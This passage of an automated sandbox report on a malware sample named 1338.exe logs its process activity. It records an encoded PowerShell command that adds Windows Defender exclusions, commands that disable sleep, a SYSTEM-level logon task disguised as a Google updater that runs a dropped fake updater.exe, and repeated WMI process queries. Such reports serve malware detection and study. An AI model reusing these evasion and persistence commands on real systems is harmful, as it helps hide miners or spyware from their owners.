                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "ossgiopsxz
                    Source: C:\Users\user\Desktop\1338.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQCJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "ossgiopsxzJump to behavior
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luxykyrv.0d4.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@52/13@0/0
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5952:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4452:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 1338.exeStatic file information: File size 1951744 > 1048576
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\TelemetryJump to behavior
                    Source: 1338.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1dac00
                    Source: Binary string: H:\CRYPTOCOIN\Mandark-master\obj\x64\Release\ClassLibrary.pdb source: conhost.exe, 00000018.00000002.674440898.0000027E779F0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Obfuscated command line found
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'Jump to behavior
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_005DD44E push rsp; iretd 0_2_005DD44F
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_005DDAC0 push rax; retf 0009h0_2_005DDAC1
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_005DD900 push rax; ret 0_2_005DD901
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_005DDB00 push rax; retf 0_2_005DDB01
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_005DDC00 push rax; iretd 0_2_005DDC01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9F1B509C2 push cs; ret 4_2_00007FF9F1B50BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9F1B54FFD push eax; iretd 4_2_00007FF9F1B550A1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9F1B57317 push ebx; iretd 4_2_00007FF9F1B5731A
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF9F1C079BB push esi; retf 24_2_00007FF9F1C079BC
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00409AC0 push rax; retf 0009h37_2_00409AC1
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_0040944E push rsp; iretd 37_2_0040944F
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00409900 push rax; ret 37_2_00409901
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00409B00 push rax; retf 37_2_00409B01
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00409C00 push rax; iretd 37_2_00409C01

                    Persistence and Installation Behavior

                    barindex
                    Creates files in the system32 config directory
                    Source: C:\Windows\System32\conhost.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Source: C:\Windows\System32\conhost.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                    Source: C:\Windows\System32\conhost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
